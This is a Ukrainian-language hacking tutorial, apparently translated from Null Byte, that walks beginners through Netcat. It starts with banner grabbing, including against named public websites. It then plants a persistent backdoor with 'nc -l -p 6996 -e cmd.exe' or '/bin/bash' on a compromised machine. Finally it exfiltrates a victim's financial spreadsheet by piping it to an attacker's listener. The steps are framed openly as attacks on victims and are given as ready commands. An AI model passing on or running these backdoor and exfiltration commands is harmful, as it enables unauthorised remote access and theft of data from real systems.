Як використовувати Netcat - швейцарський армійський ніж хакерських утиліт
Рейтинг статті: / 18
НайгіршеНайкраще 
netcat
Netcat добре відомий в колах хакерів, але практично невідомий за їх межами, хоча настільки потужний і корисний, що багато хто відноситься до нього як до "швейцарського армійського ножа хакерських утиліт".
Розглянемо можливості цього простого інструмента і як хакер-початківець може його використовувати.
Дійсно. що таке Netcat?
Netcat, як і багато хакерських утиліт, був створений, як інструмент аналізу мережі. Розроблений спеціалістом, відомим лише як "Hobbit", який віддав цей інструмент для ІТ-спільноти без компенсації, але отримав десятки нагород. Спасибі, Hobbit!
Таким чином, Ви можете використати його, щоб відкрити TCP і UDP з'єднання між двома комп'ютерами через будь-який порт, який душа забажає. Він також може бути використаний як інструмент сканування портів, подібно nmap. Крім того, він може бути використаний для перенаправлення портів, для проксі, простого веб -сервера, і щоб залишити відкритим бекдор для хакера.
Давайте за допомогою системи BackTrack подивимося на деякі з цих можливостей.
Крок 1: Відкрийте Netcat
Після того як ми запустили нашу систему BackTrack і відкрили термінал, можемо використовувати Netcat з будь-якого каталогу, так як він знаходиться в нашому каталозі bin, який є в нашій змінній PATH за замовчуванням. Отже, давайте введемо:
· nc -h
netcat-1
Як Ви можете бачити, основний синтаксис для Netcat полягає в наступному.
Щоб підключитися до іншої машини:
· nc options host IP address port
Для прослуховування вхідних з'єднань:
· nc -l -p port
Крок 2: Використайте Netcat для підключення до віддаленої системи
Давайте використаємо Netcat для підключення до віддаленої системи. У нашому випадку, постараємося підключитися до веб-сервера через порт 80. Набираємо:
· nc 192.168.1.105 80
netcat-2
Це дає нам з'єднання TCP, за замовчуванням, до веб-сервера (порт 80) на 192.168.1.105. Тепер, все, що ми вводимо, буде спрямоване безпосередньо на веб-сервер, коли ми натиснемо Enter.
Крок 3: Використайте Netcat, щоб захватити банер для відбитків пальців ОС
Як тільки ми отримали зв'язок TCP з веб-сервером, ми можемо використовувати Netcat, щоб захопити банер веб сервера для ідентифікації, яке програмне забезпечення працює на веб-сервері жертви.
Пам'ятайте, що, перш ніж атакувати будь-яку систему, ми повинні взнати якомога більше про жертву. Netcat може допомогти нам з цим завданням, захоплюючи банери, які веб-сервери обслуговують для нових підключень.
Тепер, коли у нас є зв'язок, ми можемо захопити банер з веб-сервера за допомогою команди:
· HEAD / HTTP/1.0
Будьте обережні і скопіюйте в точності, як набрав його автор, з косою рискою і пробілами.
netcat-3
Натисніть Enter кілька разів, і веб-сервер відповість своїм банером, повідомивши нам, яке його програмне забезпечення запущене. У нашому випадку, ми можемо бачити, що веб-сервер працює під управлінням Microsoft IIS 6.0.
Ми можемо використати цю техніку також на інших загальнодоступних веб-сайтах. Давайте спробуємо на деяких широко відомих веб-сайтах і подивитися, яке програмне забезпечення вони використовують на веб-сервері. По-перше, давайте спробуємо веб-сайт wonderhowto.com. Коли ми пропінгуємо wonderhowto.com, то побачимо, що IP-адрес 98.129.110.26. Таким чином, можна потім ввести:
· nc 98.129.110.26 80
Після того, як буде зв'язок, ми можемо захопити банер веб-сервера, знову набравши:
· HEAD / HTTP/1.0
А потім натисніть Enter два або три рази.
netcat-4
Як бачимо, wonderhowto.com працює на Microsoft-IIS/7.5.
Якщо ми спробуємо те ж саме з cnn.com, то отримаємо результати, наведені нижче:
netcat-5
Цікаво, cnn.com працює на nginx - веб сервері з відкритим вихідним кодом, який за дуже короткий проміжок часу досяг в глобальному масштабі загального числа установок Microsoft IIS (Apache, як і раніше, використовують понад 60% веб-серверів на планеті).
Йдіть далі і спробуйте його на інших веб-сайтах і з'ясуйте, які сервери вони використовують.
Крок 4: Використайте Netcat для прослуховування підключень
Тепер давайте використаємо netcat, щоб створити слухача на віддаленій системі. Припустимо, що у нас є Windows Server, на якому ми встановили netcat. Тепер ми можемо ввести наступне, щоб відкрити netcat слухача на порту 6996 (це може бути будь-який порт) у цій системі:
· nc - l -p 6996
netcat-6
Так створили "слухача", який може підключитися до нашого дозвілля. Зверніть увагу, що на системах Windows, ми можемо запустити цю ж команду з верхнім регістром L і це створить постійного слухача, який відкриється, навіть якщо система буде перезавантажена.
Крок 5: Створіть Backdoor
Тепер давайте створимо бекдор на зараженій системі, щоб ми могли повернутися в будь-який час. Команда буде незначно відрізнятися, залежно від того, яку систему, Linux чи Windows, атакуємо.
Для Windows ми використовуємо:
· nc -l -p 6996 -e cmd.еxe
Для Linux використовуємо:
· nc -l -p 6996 -e /bin/bash
Це відкриє слухача на системі, яка буде "трубою" команди оболонки або оболонки Linux Bash до під’єднаної системи. Тепер на нашій атакуючій системі ми вводимо:
· nc 192.168.1.105 6996
netcat-7
Як Ви можете бачити, командний рядок Windows провів по трубопроводу через наше підключення netcat безпосередньо до нашої атакуючої системи! Ми маємо цю коробку!
Крок 6: Копіюйте файли (exfiltrate) з мішені
Netcat також може бути використаний для фільтрування файлів і даних від жертви. Давайте уявимо, що є дані на системі жертви, які ми хочемо. Можливо, фінансові дані або дані, що зберігаються в базі даних. Ми можемо використати стелс-підключення для повільного копіювання цих даних на нашу атакуючу систему. У наведеному прикладі будемо фільтрувати файл з ім'ям financialprojections.xls, ймовірно Excel файл з фінансових прогнозів.
З системи джерела вводимо:
· type financialprojections.xls | nc 192.168.1.104 6996
Ця команда говорить: відобразити файл financialprojections.xls, а потім передати його по каналу (|) до netcat (nc) з IP-адресою 192.168.1.104 через порт 6996.
netcat-8
З системи призначення ми набираємо:
· nc -l -p 6996 > financialprojections.xls
Ця команда говорить: створити слухача (L) на порту (р) 6996, а потім відправити дані, отримані на цьому слухачеві у файл з ім'ям financialprojections.xls.
netcat-9
Ми можемо бачити на скріншоті нижче, що файл був скопійований через наше з'єднання netcat через порт 6996 на нашу атакуючу машину!
netcat-10
Це лише невеликий приклад того, що може зробити ця потужна маленька програма. Коли Ви об'єднаєте її з деякими основними навичками створення сценаріїв, то можете тільки уявити собі, які неймовірні речі зможете робити!
(Джерело EN: null-byte.wonderhowto.com)
 
>
КнигаНовиниПрактика пошукуПартнериПро нас
Підтримка та дизайн: Могильний С.С. Шаблон: Joomla Templates by BuyHTTP Joomla Hosting